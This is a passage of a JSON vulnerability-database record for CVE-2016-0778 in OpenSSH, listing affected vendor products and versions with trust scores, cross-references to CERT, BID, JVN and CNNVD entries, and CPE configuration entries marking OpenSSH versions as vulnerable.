"scope": "eq", "trust": 0.8, "vendor": "openbsd", "version": "7.1p2" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.10.5" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.11 to 10.11.3" }, { "model": "solaris", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.16" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1" }, { "model": "junos 14.2r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "junos 13.3r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.0.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.3" }, { "model": "purepower integrated manager service appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.0" }, { "model": "junos 12.1x46-d35", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "purepower integrated manager kvm host", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "pan-os", "scope": "ne", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.1.3" }, { "model": "purview", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0" }, { "model": "junos 15.1x49-d40", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.11.4" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.17" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.10" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.18" }, { "model": "ids/ips", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.1" }, { "model": "junos 13.3r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7" }, { "model": "junos 15.1x49-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x46-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "nac appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0.3" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "junos 14.1r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.10" }, { "model": "junos 12.1x46-d45", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.14" }, { "model": "junos 13.3r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 15.1r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "6.2p1", "scope": null, "trust": 0.3, "vendor": "openssh", "version": null }, { "model": "junos 12.1x47-d11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "purepower integrated manager vhmc appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0" }, { "model": "junos 15.1x49-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.0.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "junos 15.1f3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "16.1.2" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.8" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.8" }, { "model": "netsight appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3.0.179" }, { "model": "extremexos patch", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.38" }, { "model": "junos 15.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 15.1f2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "5.0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "junos 12.3r11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.5" }, { "model": "junos 15.1x49-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "5.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.4" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.6" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.2" }, { "model": "junos 14.1r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.70" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.7" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "5.6p1", "scope": null, "trust": 0.3, "vendor": "openssh", "version": null }, { "model": "nsm4000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "junos 13.3r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x47-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.0" }, { "model": "junos 14.1r7", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 14.1r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "virtual customer access system", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "14.06" }, { "model": "junos 12.1x46-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "16.2" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.15" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "junos 12.1x47-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nac appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3.0.179" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.4" }, { "model": "opensuse evergreen", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11.4" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.8" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "junos 14.1r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "15.10" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "virtual customer access system", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "15.07" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "identifi wireless", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "10.11" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "7.1p2", "scope": "ne", "trust": 0.3, "vendor": "openssh", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.4" }, { "model": "junos 12.3x48-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.3x48-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "extremexos patch", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.31" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.13" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.5" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "mac os security update", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x2016-0020" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.8" }, { "model": "junos 14.2r6", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.3" }, { "model": "junos 12.3x48-d30", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "4.4" }, { "model": "junos 12.1x47-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "junos 12.3r12", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "purepower integrated manager appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "flex system chassis management module 2pet", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.7" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.2" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.6" }, { "model": "junos 15.1f1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.1.2" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.12" }, { "model": "junos 13.3r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.1" }, { "model": "junos 12.1x46-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "extremexos", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "16.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.3" }, { "model": "junos 13.3r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.3" }, { "model": "junos 13.3r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x46-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "6.2p2", "scope": null, "trust": 0.3, "vendor": "openssh", "version": null }, { "model": "junos 12.3x48-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "7.1" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "purview", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "0" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "5.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.3" }, { "model": "junos 12.1x46-d36", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "purview", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3" }, { "model": "junos 14.2r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.6" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "junos 15.1r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "5.1" }, { "model": "junos 12.1x46-d40", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.1.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.2" }, { "model": "junos 15.1x49-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "virtual customer access system", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "16.05" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "junos 13.3r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "remote device access", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.9" }, { "model": "junos 14.2r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 14.2r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.4" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.00" }, { "model": "remote device access", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "8.7" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "junos 15.1f5", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 13.3r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 14.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "junos 12.1x46-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.6" }, { "model": "smartcloud provisioning for software virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "junos 12.1x47-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "junos 14.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.1" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "junos 12.1x47-d35", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.4" }, { "model": "junos 12.3x48-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x46-d26", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "identifi wireless", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "10.11.1" }, { "model": "p2", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.8" }, { "model": "netsight appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "purepower integrated manager power vc appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "junos 12.3r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.5" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "7.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "15.04" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.10" }, { "model": "junos 14.1r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.5" }, { "model": "6.9p1", "scope": null, "trust": 0.3, "vendor": "openssh", "version": null } ], "sources": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "BID", "id": "80698" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "CNNVD", "id": "CNNVD-201601-250" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.4:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.8:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.7:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.1:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.5:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.3:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.0:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.6:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.9:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.6:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 